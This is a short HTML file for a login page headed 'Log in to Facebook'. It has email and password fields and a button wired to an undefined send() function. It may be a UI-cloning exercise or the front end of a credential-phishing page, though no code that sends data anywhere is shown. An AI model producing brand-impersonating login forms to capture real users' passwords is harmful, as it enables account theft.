<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Login</title>
        <link rel="stylesheet" href="stylesheets/login.css" type="text/css">
    </head>
    <body>
        <div id="wrapper">
            <div class="center">
				<div class="content">
                    <div id="login">
                        <h3>Log in to Facebook</h3>
                        <input class="input" id="username" type="text" placeholder="Email address or phone number">
                        <input class="input" id="password" type="password" placeholder="Password">
                        <button class="input" onsubmit="return send();">Log In</button>
                    </div>
				</div>
			</div>
        </div>
    </body>
</html>